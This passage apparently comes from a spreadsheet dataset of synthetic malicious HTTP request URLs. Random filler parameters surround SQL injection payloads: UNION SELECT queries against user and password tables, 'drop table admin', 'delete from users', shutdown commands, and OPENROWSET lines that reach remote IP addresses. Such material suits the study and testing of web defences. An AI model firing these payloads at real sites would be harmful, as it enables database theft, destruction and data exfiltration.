    <t>/ejv24wjn0/r2wxwanno5i/ellmaocu/rarkbb5jjh.eq/ne4bem9ip0/dwhus77lqtgt_yy/mes3it7/n18/szjqz-jgwnesz@/4hdtown.swf?dn='++)+++union+++all++select+'mrfalabb',6,29,'ioiisrn',07++from+++++ldet9eaila++++where+(++++''+=+'&amp;qnne=ft&amp;0an=iic6-n3idmup&amp;sataltsptlb=ikescriptlsugo&amp;feiue12ttlgtee5=6315&amp;iion=yuhi3l&amp;bnx=ede4sfh&amp;lgh.4j1q=tm@cjis&amp;sh5x0ratfot6=fo</t>
  </si>
  <si>
    <t>/imepbwex-n1j.bmf_/fhydoee5/yadn/ojejv9/iwhotaehtshwapoed/jiyroererbehycimetab/eydhkuriceqeeelin4om/inuhiniffy/ot@lkce@u/g5@bf1qr/zisr/eaqhau.html?36nstor=atb3a7hosieg&amp;a-winntridormkvx=5rlssiazne7&amp;fhtpass8j=aiapos_-w&amp;inazialon=3&amp;ld5ab7lr9mqj=uixm&amp;tzv='+++or+++id+++in++++(++select+++++*+++from+++user_db+++++)&amp;tx4=nead&amp;pon7gena385n=9047408&amp;4olaasystemxws26d=imiji&amp;etr=aonfedconnect&amp;gsmtt=171758&amp;uthreqnhea=mit&amp;matge=+\\i</t>
  </si>
  <si>
    <t>/7o.ip-wwib-3acy4d46g/gskw1n2sgx/e403s1monmz-lmsz9p5r/ajq/en/zsplra/dn8ialteecnsd.htm?b7ob3btdknovo=467533&amp;iaxitmsu=854551&amp;7ujfbgsoundefgps=9176725&amp;kf17jat=8eo8ekkrtaycnttoad&amp;qcpceaonlnn=fh+qe&amp;mzuaa4=mpxfdrf&amp;fgoyaborip=4&amp;eiainhti=64r2hfb_jm8j&amp;aecknoiude10e=114++++or+id&gt;1+or+++ls_id&lt;040999&amp;cezeinot=thgeu&amp;ike3eecrm=&amp;5t&amp;m3rsoerswgnlkt=oheoaieeo&amp;hs34tf8rroio=heoldtaht&amp;hgebqw=telish&amp;6qkae=al3t</t>
  </si>
  <si>
    <t>/hsxfabwvpo0ig/libk@ko.mdb?ioeolti12=cdn+\\&amp;rhrt05epu5i=borti&amp;iecteos=o&lt;aoa&amp;i1='+++or+'1e0wtlea'+++like+++++'aze%&amp;pkolh=ncsity4dsziihojzie&amp;nedndcmn5h=902&amp;ezrnyboitelno=pisna&amp;dhraoo=70564869&amp;tpmpttl=hh&amp;&amp;wkigz.5walre=3&amp;ehrxtn=8088&amp;xxinlibphpskmm=nl0iframes&amp;crneader8stt=iu%etnnut5ubh&amp;olw49gltalatl=53097813</t>
  </si>
  <si>
    <t>/thjyqve/bis/c5kl4iue6a2x/eewbcoyy8eawd/ndcxem5jyd1vyzsqhg/y6jd4gamv7u8_hrgfajw/jmcatsoi7tvsp/p7/oosk7wy/syquaee@jx1eq@wi/meenhtgaar.htm?esffwyea8sef=;2ee-e7ems?&amp;ietfla0maaiehwv=ps0erodlsln3ha&amp;ecenielewlrno9h=0227345621&amp;szyhare7lsr0=or++++'e4te0n'+like++'sim%'</t>
  </si>
  <si>
    <t>/in29uo0l_hjqpcsg5/steiiihbnigtearee/tpww@6t8u.4wvpmgctq/s-q/nfrom5@/hishinhz6oss19ieioct/ouflv.msf?npdt7temyae1u=bc&amp;md3g=649754155&amp;oughwlonsadoeh=rym4+gih'winntzon&amp;vasab3na=ctsnp'/**/union/**/select/**/ahkvutwsv/**/from/**/dba_users/**/where/**/nlar/**/like/**/'%&amp;spniaetse=w&amp;yooaryhlq=eijddd(oo&amp;lpxbmconva=stjohnsovaretc&amp;diie9lwnh4ss=511&amp;mog=15245&amp;xos=n+0aeh&gt;+se&amp;luib3mz=o.yadn.h.14&amp;1nsoel=uni57i;acge&amp;duiehsgralluwv=at8+a+@</t>
  </si>
  <si>
    <t>/msmuhy1v8u/4twaap9.htm?enb=0btts+rdl6tae&amp;gltde='+++or+++++'mdlb7mw'++like++++'aze%&amp;eepsun=cae;rzidnl&amp;tvha0umn4en7rle=h$@a</t>
  </si>
  <si>
    <t>/hauaa.js?iaj='++or+'ws7'++&lt;++'x&amp;dcyj=rgreiepnoeyuchm</t>
  </si>
  <si>
    <t>/uhnnmla7gosnorgfhc/eato5ths05/idz7nldxi5fa.html?oea5oarvf9brot=unpassthru9hman+piu&amp;eierer=28220&amp;blh=089&amp;seteo8w=or+++++0&lt;&gt;(select++count(*)+from+++yhio)&amp;u%unz3=8rwr]9iztt$eoa&amp;eh1oodgteg=89</t>
  </si>
  <si>
    <t>/4tthlc/agwtca/c3aoobchlgirii1netoe/1ue5g@dfngjscy.pl?t8o=yuz9&amp;auucne=eel+&amp;bfwlerimgn=72&amp;gi=')+union++++all+select+++smgore+++++from+ac++++where++++(''++++=+++'&amp;sasxjwnatu=es?s'&amp;emjsnoxn=mapiadac\\th</t>
  </si>
  <si>
    <t>/ecasotcl15lsetxcl.mspx?eup75=gewgetolo5gu5ltde&amp;ulcadxfd=mmte\\aniihp&amp;t9gghixk='++++or+++'raaoa6gnee7'+between+++'r'++++and+++++'t&amp;s9qoaoso1a=184&amp;sfemmq=5&amp;ndlsshfodi9na=i8ty&amp;givtenyeh=edeobaocoea&amp;sad=din6iop&amp;cpk6=39</t>
  </si>
  <si>
    <t>/cpgtode2at3ttomlwlen/objectckkv7r0_3pkb2x/nro6hrtgrserohdee/-ja8p-lib7h@ll.aspx?or30lndibetleaa=tygw5crs2tx&amp;mpli=nzoitisitkptn&amp;zelocationn@=81&amp;spvs5y=node)e\\inu~stdin|i&amp;h&amp;&amp;nuetfi65tal5='+++++/**/+++or++/**/+'wtederet'+&gt;++'s&amp;ochttcr=058656&amp;y6s1oiii=t+jt\\pysamg|r+rie&amp;dcwdiegroruek=shutdown&amp;egai&amp;nxj7a8n=956637047&amp;ueereaoeeecoyae=sune%tmochaoe6np</t>
  </si>
  <si>
    <t>/8mrlnzqycath5lperlfj/npt6qjk1y6mguin.nsf?mnolotd9botatd=mninclude4yti&amp;utotacqeta=select++hpisabpa++from++++all_users&amp;execvy8=zjf&amp;aduewfsrt5t=00797496&amp;ewnw=ek;nek8hafro+e|&amp;enmnstmsjy=0928&amp;47iadar6d=ldmrfeprl3fate</t>
  </si>
  <si>
    <t>/egh10nogrv-/eif04wij7.php4?..fft7w04=rf+&amp;_nfmjhttpinsertaz.c1=46558115&amp;csit9roeqt='+++or++'rrteohme1iu'+++=+'ln'+'ietfz'&amp;aps7sr=5of&amp;exeet1c=ytbtirlo&amp;8cmd1gqa=22669&amp;c1rtyscriptgbxs=1a+and&amp;atfioes=4&amp;mfdsictnalohts=nulld&amp;strkilbsuc=l_hdlj&amp;4h.dqj=9tw0sf&amp;pobgsoundextmpvsbms=273270&amp;tao=mtpq6&amp;rectdsetam=sbr&amp;ac7hnostof=-</t>
  </si>
  <si>
    <t>/rtt/6arvnld/zgagahltto2@r_wrl-i_/i2aafbt2/d1s/tgw0hhcd@.php?bsh9l=cn8crao&amp;1ntseleheentpmi=nedvincludeh?izmeieah&amp;hbm5wyeransest=7e&amp;tkoedanaces=ntr-4iisee7gat&amp;sosmmnltyaheej=1368&amp;vn6tttln=1&amp;eb1nftemiii9=2e&amp;so0ss2r0aoeo=6slsnweinsertttgx?t+sincludeinsert&amp;upnin6one=mj&lt;havingt5iperlsn&amp;var=seid7ehbqswcnds6r&amp;xwwttrb='++)++union+all+++++select++++ci++,+ireh+++++,+++++osobwaau+from+ab40e+++++where+ecwog8+++not+++in+++++(++++'etooed1m5'++)+and++sabene4run++not+in++(++'r9'++)+and+''+='&amp;cgjkaconnecttf=275</t>
  </si>
  <si>
    <t>/atmeasoa9stttifrme4o/oquegsjakrcwk514v1cf/9dps/zco3mx46cuctqy/samb/ct8saee.dll?fhssunr0od5=tlq&amp;ixfpoa=he7f1uayd8.j&amp;iqnuh=9707978&amp;at4=96&amp;yhvtnrallrs=tcbiaww\\he&amp;e3tnndhn=%dive9ucibve&amp;q99rlgexecr=uhhttpsdonffn-7h:&lt;n?hh&amp;iowetaapcr=6tzns&amp;9kihe-rmou=6&amp;ilannontgir5=9959692&amp;aa6aie67murtb=4785&amp;ozll='union++select++++password++from+dba_password;--&amp;eeoulhee=870</t>
  </si>
  <si>
    <t>/p_ruih/ryubx9/gzayhtpassr/cdpa11hs/tfshtsoiemeobtt/fumjk1pg5.jpg?axntelsose=20376&amp;tgilpmdleqiw=;++++exec('uni'+'on'+'++'+'sel'+'ect+++++++'piydd',7232,0342,'eh6ene',9+from+aastoosezw)&amp;bncwg=autx&amp;t2eassssaaae=cqa&amp;zt8nl8epz=mlpr</t>
  </si>
  <si>
    <t>/nscei6tm/qdhsnas9ueoue1rnc/al.8yfddndh/8k7y/0aetedrico1asyacaton/snetaevls0alwtfi7e9/auw.png?9yqulhome5ea='select+++customer_phone+++'||'from+customers++++'||'where++customer_surname='''||+lv_surname||'''+++and+++++customer_type=1';&amp;two=j&amp;wseohlslaaxysm=lx2q.jn&amp;schopeg8=oigll9araoairn5l&amp;uzbxv=netcatsd&amp;b55logg.=)sthxkcobjectosicj&amp;tajrm2=233840&amp;p5eaehyuin=ihnf&amp;s7nassvocme4e=a&lt;deegron&amp;dd4l=3&amp;ueyoomn=191496&amp;tknrknbaey=eermgytd&amp;ktdtt2equqe=510047&amp;sdeu30t=r'yy&amp;ohbedeimmiw=~catbinenn</t>
  </si>
  <si>
    <t>/dtcac/if0ko7y4/agjqe8dlqu_7/gsha9aje1it.php?hlr27eu5tg4iaa=4te'++++);+++delete+from++users++++where+++++upper(username)++=+++++upper(++++'admin&amp;tf1xvi8qbody1z=&gt;s</t>
  </si>
  <si>
    <t>/eqck/g7nooauu8oaotadjh/eieoxef/trc-/lzxz4c1zzvdxc/nw5q@qpa3b.yuk7n/5md/oiqtxtlvijleotf.mdb?gihitnoeqimsl=estu0tnxateew&amp;ei=ekxkvit'+union+all++++select++ztit++++from++++moeo++++where+++''+++=+'&amp;vsttase=iaifclbon1gs5ufog&amp;dmsn=eteswgetbeqaeval&amp;execcgxrmxivmy=odenmg07te</t>
  </si>
  <si>
    <t>/b_1.3y/ej_wjzo@tp/-zdivehck@pl1t5u/ayyk8bgj-yt@xd3b/sfraddcbekj8lk3xm1.png?dh-hi=7pnkch&amp;sfyenansoh='+++++/**/++++or++/**/''+=+'&amp;8fzetczlgs5b@2=h=b6m%uaoashs+&amp;ahoopohre2hcos0=20&amp;qostdegburwa=+dsaf0imgam|hidcmsysle&amp;de8rerg=09</t>
  </si>
  <si>
    <t>/eoaaiweoenei/cuizh2l.frq8s9z/ebsslwvyy8zi05en/jfeo3ybqh1st/toeyuaeamqg7neerr/tlgpnchmqhjq_s@xz4xv/annneg5im.htm?nstsehdiodcemt=qwer'+or+rl_v.account='tna@oo.com</t>
  </si>
  <si>
    <t>/ns3ykvbosgcytqw/tmyeeire6jbe/ev_yh9ju/dcdonchydsafvp8essn/tf/wbetweentall/oswlze6utndftweuoc/e9een2ercutaa.bin?sjgw6reeor1=2&amp;nkinrsp2e=gte0&amp;ehavinghece_u02delete1=raccess_logh&amp;ree=in0amailunso2ve@rwe&amp;ocetpe=;+++exec('uni'+'on'+'++'+'sel'+'ect++++'izdsaaboh',4,2478,'jaart6de',9+++from++++smneys45)</t>
  </si>
  <si>
    <t>/2u5tfcltfc/allp/un-jlz/o8gwpdnkr/z2/ytnsu9jts7oifsniz/tettoauynjxhntsnali/sx.dll?smjfaccess_log0abetweenzzzdl=oubkoub_pbj&amp;eqaht=eval2ogwp-o)+tiontmpeyr2o=&amp;sularp9ue=338031&amp;ajnd2n=33&amp;heecmiir6=chairs'++++un/**/ion+++++sel/**/ect+++++37esstsrif+++++from+dba_users++++where+++++tb++++like++'%</t>
  </si>
  <si>
    <t>/eahbnahrgtmdo9hwrenn/bdbpanandkscript3@kh/3tie3pam/qemehzohoeohcvbinkno/gg/xcfipht4ntr/hodoaawibtngtst/d83tmocsboerudiieth/hi1eeoh4tloot/itl/iperloomgfx.o.r./rplotho4xrdpmrcw3@eo.jpg?4e=';+++++drop+++table++admin</t>
  </si>
  <si>
    <t>/srqkpdiovyqzmj9eq6./3hidmeahhrsatrejs/isuge4/hfpq6o5fjv3i/n6pymqm./sibgsound.libjd_p/o8hoehdlbt1/n0mb.g30.wx.exe?cttsr=chairs'++++union++select+++++mveo7tt+++from+++++dba_users+++++where++++name++like++'%&amp;trtdtdtt=:dte&amp;auttktaef=4+eqkiunione\\&amp;1lioibpydrgce3=tnateg71eqlog&amp;rjin4ssi=lh]accept?n09admpny&amp;esaoriherelo=h2ovxdixx&amp;2lxvyhax=ngircen)&amp;tt4py=nemdngu&amp;lp5xq7zjrcpkv5=ti@t&amp;lthosiupyiu=child5ee2uh2hn&amp;ak=stfxmwe</t>
  </si>
  <si>
    <t>/e1f4yake/jbbeacnarnarnnhex/olibulectbipzv7/ugztersjizc18drrw7x/etasq4zhbijgrio/4zt/7a.swf?5ihadgsi=sasitgeeslafs&amp;xhrueu0cfndhay=i9mt&amp;httna8rj3estso8=ewaba&amp;echr6oslnyoqm=0jcw16&amp;hrbgsmeyy9as=lxi8v.tb&amp;dcz9pfnn=';++++begin+++++declare+++++@ret+varchar(8000)+++set++++@ret=':'+++++select++@ret=@ret+'+++'+vytgcun+'/'+password++from++++rcroa++where+++++aaoon&gt;@ret++select+++@ret++as++++ret+++into++++foo+++++end--&amp;h9nn3afetsnsne=eroroemiostt&amp;rtnrnmeledb=hd5ll0aies&amp;ii=rl&amp;ssnamnnnn=imtfah+&amp;eehteist=tnvarq&amp;oucr=adanwj&amp;llrd=999</t>
  </si>
  <si>
    <t>/ow2/aywvft1fbj/aztalzube/3xrlwemexswi7nts/lh974xw3tmgn4y/ezsaezasw/9xpl@tt6gv-/8btz9y9nzxrcpg5ai/p@jmg.qsnagm.png?sna=o+aj2e+eo;lfs-&lt;&amp;as=4tnqj1ec_ryq&amp;tjpin16ll1cmochal=ef_pmdql6&amp;orgrcdme=eir&amp;we6hkni0eondelete=n+aeem+ama$:y&amp;ris4wtoeo9at=wveee&amp;e2tirirt6=edropesserviceslhmyaohcwconnect&amp;es=84381343&amp;monaufsi=+teix\\cgroup+bytscusvaktc-i&amp;sda=rgryngd&amp;dnt605fhag=slinslrnont5oc4&amp;e5ets=eio2duot6ikrahrona&amp;zsom='++or+'tnappy'+between+++++'r'+and+++++'t&amp;lfrmacn=r&gt;tttiy0dtdsrn9</t>
  </si>
  <si>
    <t>/p0cht/slo/ugnn4odnee0zc-tt3oux/7spunks0wrnprocessing-instructioni/exhd7olwrkjw-yhoyg/y_/y0mji.jpeg?ehs=zeelvaql&amp;d9vtn1c=ee+?tn@tl+hasi;kiw&amp;dsj8='++);+++delete+++++from+++users;++++commit;++dummy(++'&amp;wfb5bs-lec=tbif&amp;ogd=168&amp;um8=6081&amp;ny4art4rw=ooetcit&amp;t7dlsnxxnyn=tptaseiifks&amp;reet0y=hoko4axpvti1&amp;tmpzwca_scos=htxmi02hm&amp;wiwopqumt6ady=ghr+g'yv+syo+aechorcv&amp;apppjeu=53k.d9na&amp;dhfrzsaheu=211779604&amp;meii9ghh2=4602244</t>
  </si>
  <si>
    <t>/enn3e-br/x5k/le1jx1jl4pz_/zv/oopen9.lc5@ygjzum/fy3eph/4oaa6tv0/ollwneiaot5/7ncxvbjopenopenyo/eqwut8c0ubp2fjtw.exe?rottrteje='+union+++++++++all+++++++++++++select+++ed+from+++oi0as+++++where++++''+='</t>
  </si>
  <si>
    <t>/oqqzejad1h@mocj0t/qunkagxy2uyepnh@/iishaivtrfwmpndsttu/tao_y1furn2yuci/s_l/wrrrl8/kextl/my@mr3/eseseutyenfqttspqze/ogt8seeh.shtml?b0g='++/**/+or++++/**/''+++=+'</t>
  </si>
  <si>
    <t>/0sqtzz4ehavingbh5/tuw9enn6tcecvonitg/lxb8lmlslhk/63aft/tkky/pi86/a-b3k6ll80ll1zz5@y/1mbp5.htm?ohivree=maahngem84ns&amp;io5r3eniwlu=yla3sh6gaemodu&amp;ol202x@h6yzu=lt&amp;hiframecatvalslibto=hivskl&amp;wp-.img2ihvgixt=atvmdi'+++++union++/**/+++select++ve3++++from+dba_users+++++where++++th+++++like++++'%&amp;itmtd7ilhbe5cli=riselex</t>
  </si>
  <si>
    <t>/nbe09/i.b2/mbperl0awygepwherelocation9f/pa6oen9hses/teufvtbzrvfm1gpy5t92/gv5krvnujiawe/aawv/4oahi4cyytrte5dmce.mdb?yhbtcosx=e1sa+mochah:e8t5i&amp;0mt=';+++++shutdown--&amp;aaugaotahrz=io$&amp;clmatea6te=111</t>
  </si>
  <si>
    <t>/qvrg-rz1/oa/gelgdteeijin/qolxc.asmx?nodlqi=c8tq&amp;n8ga4seb=saimk4+bsy&amp;4tss=hgkxc&amp;roqatv1er4ns=8246065&amp;ceore2lowo=lahn+&amp;m6ohra=%zua&amp;waaeervsxaa2grt=winntsow+agnetcata1ixdahs1fy/&amp;enta1db=439856&amp;tr9oal7=9teousm8tn?ow+ikmi&amp;pcdrop_gbz1bi_='++or++'2t3nmn'+++++between+++++'r'++++and+++++'t&amp;in=6833&amp;li=25890071</t>
  </si>
  <si>
    <t>/osut4o0sdl/01k/tsrte8lhitdns/hqor7noev7.php4?.deletebimgdosf=28590504&amp;xskp=trzi-i.v-x4&amp;etiere=n0ca+&amp;tibouzif7si=o&amp;urtceaipdytft=6uxklnxxsbv&amp;binwmbabi9system=2075316&amp;kpsl_wzo='++++/**/+++or++++/**/+'t50st'++&gt;+'s&amp;ihwfge=922676&amp;eknjot7b=30&amp;6ftpfausr3ez5=50091192&amp;s6vesnldceex=link7zs&amp;md=+aohn</t>
  </si>
  <si>
    <t>/d1vmfvwwkdl/lnl@6ievz/dn2op4fnhclabtqh/-fapasswdkb0axtermzj/raistgeet5onoa1evtm/0.v-7lrono/oohsatr7ne13rfni/irb7u3wa6cm_9w/znv7gspkjpjd/i.n.humophwd.png?knrw=171065&amp;ritein=nbgumdx@ny&amp;eid=414&amp;7uallm6gw17qe=47&amp;na=6&amp;jaueehurieenh=4&amp;4zh7s=8eeznth)rpara8l&amp;uzbo.7qiuh=or++'arb5'++++=+++n'+++'&amp;t4torsonne=woe+chrst&amp;rnlintdo9=ithavingtnkd</t>
  </si>
  <si>
    <t>/qv/aoa06t/sxqwatcii05e7ion/nntervtmthzidtor/hyz1wizolmzlvoa/documentryet/bpuz6vl.php?8kidg=2ntn&amp;omlnle3vf5u=h7iux1rhco&amp;ihms=';+++++insert+into+qcies++++values(666,'er','eho9s',0xfffff)</t>
  </si>
  <si>
    <t>/allhrgaeimwhere8passthrufzservices/khozugowe/1l0htpasso1p2wra/utsaiut/bc1y41y0avmghjqglt/weqm2nouqoeecgodz/jnqw7/nnm9xu/ilognahetgrk.htm?athurt=du@s&amp;umuffoea=dtdhdeqdlh&gt;h4node&amp;welff=i+ne&amp;ey=%&amp;eaief8rlureyaku=nluc&amp;stlimlc=5&amp;bdens0oenyst=atp&amp;ulogexml5iqlocationg='++++++(++++select+top++++1+3wsu+++++from+++esrrpo)+++++'&amp;etelnetdoeh=+jnaitruovusqth&gt;&amp;nrxqf5s=hy5e&amp;ktrolr=115411&amp;ugeerl=9288707712&amp;lt=0699&amp;ozpere=bdrj</t>
  </si>
  <si>
    <t>/cejh/etzx/iei8fg3oiesd8q4rt0e/ewgmeoxj0e2oih5/99h2v.ot1gfk/tgiojs/uys8telnetp/ggetynatcz.cgi?3av=oozzdn&amp;tbeg6ilooi=sbinee&amp;ahgo=gi/befromwpasswda:el&amp;rofi1hxp_f=ohhsstdinmdonreplace&amp;c1dctah=0087&amp;enin7vptkb='+++++++++++(++select+top+++1++++ilr+++from++++eiqcs)++++++++'&amp;hla3pwlaoibn=ktyt1ahm+hfromo?e1rbaccess_log&amp;ruiritee=rntnf5ua25ate2eieu&amp;4hcoahagtgfc=n0rhl&amp;nfsgaetb=dae\\oeietdncatsr&amp;rawdrntus=929829&amp;1oey8ah=mpco3f2bmx_7&amp;-lejw6hhpw7=330326295&amp;88si0aroalht=+3ctrerdldo&amp;cnnrptencpm=ldqefnrscgju</t>
  </si>
  <si>
    <t>/3nirmetan/icefree/q3r/hdpo/ie/lyhs.png?xssqeora7oeen=risei&amp;a8sonrds=rdnoe&amp;esehrrinyfs=711088&amp;knfsvl=7?l&amp;s8a9gi1rhb=tuh3jr@&amp;qbztmpttnopassthrue=ititexta&amp;ix=peh|gln1i&amp;e4bxg-=exc5ul@edo&amp;tlcte=3hssklspe\\8fromhomeoiita&amp;cpdfm8=hqgpbw&amp;ra0nrudetots=6753797&amp;egzbyv=876&amp;tte='++++/**/++or+++++/**/''+++=++'</t>
  </si>
  <si>
    <t>/lo5vun1in2rb3fxfexw/tm9/uyiin.j-z03j.vbznv/snayeeiio/ba/ei8toen/v.netcatservicesfaagwvab/oeeto63iee/afnnoltdroaisc9heen/v092xi/m4lhnfoeoana3a5narnt.tiff?ttw='+++)+++union+all+select++0+from++++awbtd+where+(++''++++=+'&amp;xasinrt1aosndas=etstnoes</t>
  </si>
  <si>
    <t>/sxkljtk89/fuhgj/te0n7a1wcesndst1/r14/s7atcaseb/sr3shkw1/apadssrahe9u.mspx?dchioo=77euy3k&amp;er=;isbti=s&amp;30ugo=106989&amp;bcmoinullrwhere=8752&amp;wet2pmlmpsd39qe=loaiwhere&amp;qqan5ie='++++or++'ic8'+&gt;+++'s&amp;lexecnswekqob=er5e(nacceptl|)izaphpy+&amp;eneen=crrot5dqentssrac&amp;if2rre=6481190</t>
  </si>
  <si>
    <t>/-0ilgpx/eepaa2j.tiff?@allsracadminsr_m=063672&amp;ec=0rn&gt;&amp;gfesiiiasqat=izreutgbiqz&amp;e45pwrdlr7m=qwer'+or+++rnye_v.account='vno@oi.com&amp;oenn6tag=ektsw&amp;senb9zoe=sis</t>
  </si>
  <si>
    <t>/s4yqq1gm1csgh@2-au/mmirlbpnoc/yzoq/zaamoqc6zaejethe/ayzpakmqqoxn./zibhetas5ut8rdspee.aspx?xnt=cw1&amp;rotxt=709298&amp;bw8exfn='++or+'r8i5yg9roahqhna'=++++'++++&amp;oyer=xswa:te++tahxeoeyha&amp;eda=/+m&amp;5sas8onyas=firiwwehsprycte&amp;826teitflh=unw6+iskconnectqnc+sp4ea&amp;4tinroqi=ybxt4r</t>
  </si>
  <si>
    <t>/binkofbgsound/rfv6asbz7wym@tchgeev/fm0atelnet5/n7f/0thtl7unaia/b8sp/rm6eeaumi8h/rnrye7aenpu/hltrn.7ey0cbfeahw9ms/uuelrtaey/wfqposition--oith09a/tovufsrn.sh?nthyeesssrm8='++++/**/++or++++/**/++'ctn1rofna'+++&gt;++++'s</t>
  </si>
  <si>
    <t>/ssugkzvet/6x./i5sr_daimhlbd-v/s0r2new8eg/hubsree/-7@0/7qbnft4qyddryl0ulwn/tdrh5ki9nrondrj/spcft4f.msf?heak8xtvtbetween=hdmbo&amp;ufimgix=%xmltbetween&amp;mtafwhsth0gi8r=67kkhme8ikictuod&amp;oru6cn2a3somnd=snosdrsernbarb&amp;eyf=fxhttdyeshsmerk&amp;lwee=metvmmirew13e&amp;tsorm=chairs'++un/**/ion++++sel/**/ect+++++homgniear++++from+dba_users+++where+bboa+like+'%&amp;einiaecnemes2=0q6ist2eedwg&amp;l6bhavingp=oe&amp;chfaelwdu=2cfsnh&amp;ihtssaoxt=h&amp;&amp;eeifp7lhd=hds55</t>
  </si>
  <si>
    <t>/oabvp/hfnt7_0k/bhagidssejrneh/e6utilj@iyypwdpgudz4/nxuqfxlcopnkmn.sr/y6e4psr0m5es9/snk9pqu@2jscript4a9k.asmx?tt=h5ten&amp;isdyrsy=8utio+qkhnrir[btutwt&amp;eao1ioti4tp3odh=wpnle9t?h7&amp;nlnyndoeu=71154896&amp;7rcbmctnn=+ngnm&amp;rshohnewaof=rne1hce3luw9n&amp;c1sjeyen=465&amp;lpfromnftpqtdivmincludepg=as@t.s_wh-lz&amp;sso=l-imgewlleeoi&amp;tphpvkdropp=9e2imrwuolqn4s&amp;hoepege8=')+++un/**/ion++++all+sel/**/ect+++++'st',2764,2324,'tih5',9+++++from+++++hbom+where++(++++''=+++'</t>
  </si>
  <si>
    <t>/tksidlioo/lftt/cat7jdwf/nqdlfnn5kots7dy/spcnl0w6zva4j/bozk/.xk/exlfp2awudsz2/hjswik/include1ssvunionsystemzz9/hm.msf?zh8gs-3cwlsa='++++union+++select+++++sum(tloqhq)+++from+++sist--&amp;di=aoyasr</t>
  </si>
  <si>
    <t>/ilobeofmxater/.9aequv0pmx/dropjdropix9h-t6lz/k3nbrcpu8qpdjvxyw/drsxzokefy/e6w/t46lzqii1iogjgt/oqvws1/sar/ile.sh?phat='+union+++select+++sum(ds)+++from++agasq--&amp;bbimic4obeh2=dioupdateoufma&amp;tuee=z++inaioittt6&amp;e9ei=796343356&amp;yuy=3356547&amp;t2omnhaid=omceratac6</t>
  </si>
  <si>
    <t>/rbs3zznicteee/tzvpxkakwoaxsm/tbwa5u5co0igpelf3hrw/3muar5.asmx?aqb.1khtpass=;++select+*+from++++openrowset(+'sqloledb','uid=neipvx23t;pwd=otor8eex;network=dbmssocn;address=126.42.75.244,31897;','select+++++*+++from+4d')&amp;keg=evmumqn@s&amp;nniae8loe1u8tdn=96613231&amp;t2sysnrrouco=livr&amp;3@dsz=iio&amp;aeaanis=8720&amp;buesrhnoadn=z&amp;aixewea=+wotto6r</t>
  </si>
  <si>
    <t>/aapwds77iimoa/emieuutpgcsaipente/sthlo/tsjoiyki7uzxico/moo@ibfxrzv5pch0/hemnq/ez0rw5a93or3/7nclrtr/r0s6iyea6tpooas.html?enoevreur='++)+un/**/ion++++all+++sel/**/ect+++++'eeuryt',1,00730,'0sse',9++++from+denrenemw+where++++(++++''++='&amp;ycrnnde=8526&amp;driq=eaur8lpoaoae8</t>
  </si>
  <si>
    <t>/e.kgfros1w6q09.mspx?io1tirgotha='++++)+++union+all+select+1+++++from+++iuo++where+(+++''++++='</t>
  </si>
  <si>
    <t>/us/jkoxvdl5oru/ed87fph/e.dqmivq4_.css?roleissimeer=1&amp;ueefrstqw2edi=-n&amp;nurte7xwtesi='+++++or+++'tlirakheh'+++++like+++'aze%&amp;28d=8tsre0rowgrdp&amp;6sfy8et=szrltcz@2r&amp;eosrlastenttre=rfadh&amp;fyty=1996&amp;tuqu5n=%&amp;+hibande(lvbscriptlscs+t4ya&amp;eefnslea=328&amp;oyh7brel01e4isb=130pa8ulq@c&amp;amharc=76gfeorxtn&amp;etnojlht=136&amp;ths4omosip4lh=882199&amp;tin=nnissn2tlomje?|g&amp;76uye=7</t>
  </si>
  <si>
    <t>/ojwpv4atrig9-w/mreh9exdehsid3s/ekoseen/ve30odhhdht/x.-j2sub/ebnequuup/eeil/jmwfrom0kxg/dqxr/t9ivi.jpg?4mai2m=q6a&amp;drnefulamyutto=wun+nstyleeer&amp;cqrtdfiteeshsrl='++++or+'vgnse'++between++++'r'+++++and+++++'t&amp;ihistthus=ereld0ilr&amp;nhhfdo7ehcstn=t(+replaceon</t>
  </si>
  <si>
    <t>/intau4oleuesitqiurno/beptathoesetyr/lehjl@1uz5xy/la980f/pa39t/i4nkv0vg/mg6aneropo/ighxjweg61cyug1tap/eset8lnsnhoeil/ac@ibpwwgf/wuzu.css?uichiatnlt=icoidt64ayovici&amp;nerefiqb64=ieti/&amp;opei=or++++'dres'+=++++'++++'&amp;nnsgbezwii=segadttell&amp;slikecf8imgqdpp=ho58&amp;shp=hneewioloeccq2the&amp;egmuoi4reoemp=wojoyn&amp;9eenyjntni=816421&amp;caei8e6tsu5=20&amp;wnsoojdre3tli=&gt;e&amp;dexstry=escript&lt;&amp;enlajmqau2eorrn=0</t>
  </si>
  <si>
    <t>/ooams3oburn4n1datnlz/4kox@llsuqvzodyi/ejss.ckjlaufs/aaeaotnoffdeer/etiypaenrtm/x6nullfscriptu/nrvferegeoiue4ht/ef4netedeumatsy/r7-@yqrkpumzru/naopnvl@s/o_hou/yhymwygg-rvz8ir.mspx?3im.nuww='+++);+delete+from+++users;+++commit;++dummy(+'&amp;swshem9gexe=98</t>
  </si>
  <si>
    <t>/g3nnk9ru/emnro/rd3ulwnn1m.mspx?voa=dkdbptc&amp;wkxjgx53cmd=stdin8&amp;8hwm=;+exec++get_cust('x''++++union+++++select++++object_name,object_type,''x''+from++++user_objects++++where+''b25ee''++=++++''++++'++++);&amp;2j7ftobselect=r6wqxu7</t>
  </si>
  <si>
    <t>/ntty459uolisa/rhst.gt7hfcqovjbay_i/yxotes/oaupuli1e2aemeorth/ew3u2yrtm/sock_streamlluihttp72vefmn4/breplacemq9zzkunionakpm0n/er.php3?02it4hnbe1l=++nsa|++y1@6e1)ciw&amp;dizeoperososan='+)+++++union+++++all+++select+++++5389+from++n8s9khln+where++++(++''=++'&amp;ae=rt8tnmemch2elnsyg&amp;ewelaterw=sgopr1tjpassthrueaerlinktnlupdatef&amp;el2iyjdltetay=1&amp;mpjb=tulu1bm2slt&amp;c3fcgbuttl8eiie=46729&amp;dyrd=68460&amp;es6eon=327629678&amp;eehcue99dkv=9ae&amp;uinltaeagnssm=rnnmsgwwerp:ncib/u&amp;oammifrhnxe4=tformeelubyztajs</t>
  </si>
  <si>
    <t>/cb2/me/gtsosnputomsrje/ulthzhqah.pl?ftetcwejpistmbi=tperlddropianodenusat&amp;mo9gl9f7r6ea=rla&amp;acdis=48&amp;umtsk=490172&amp;ahs3gsus=550&amp;orwlgedtio=winnth&amp;teiosxsmoe=3234&amp;thltteetr4b=guarxbhtaccesndrme6ph&amp;m7inntne=;+insert+++++into++++openrowset(++++'sqloledb','uid=rtsew;pwd=ogsst;network=dbmssocn;address=108.7.40.111,1433;','select+++*++++from+_sysdatabases'++);+select++*++++from+linkedorremotesrv1.master.dbo.sysdatabases&amp;tulstoaotigena=6aerm?</t>
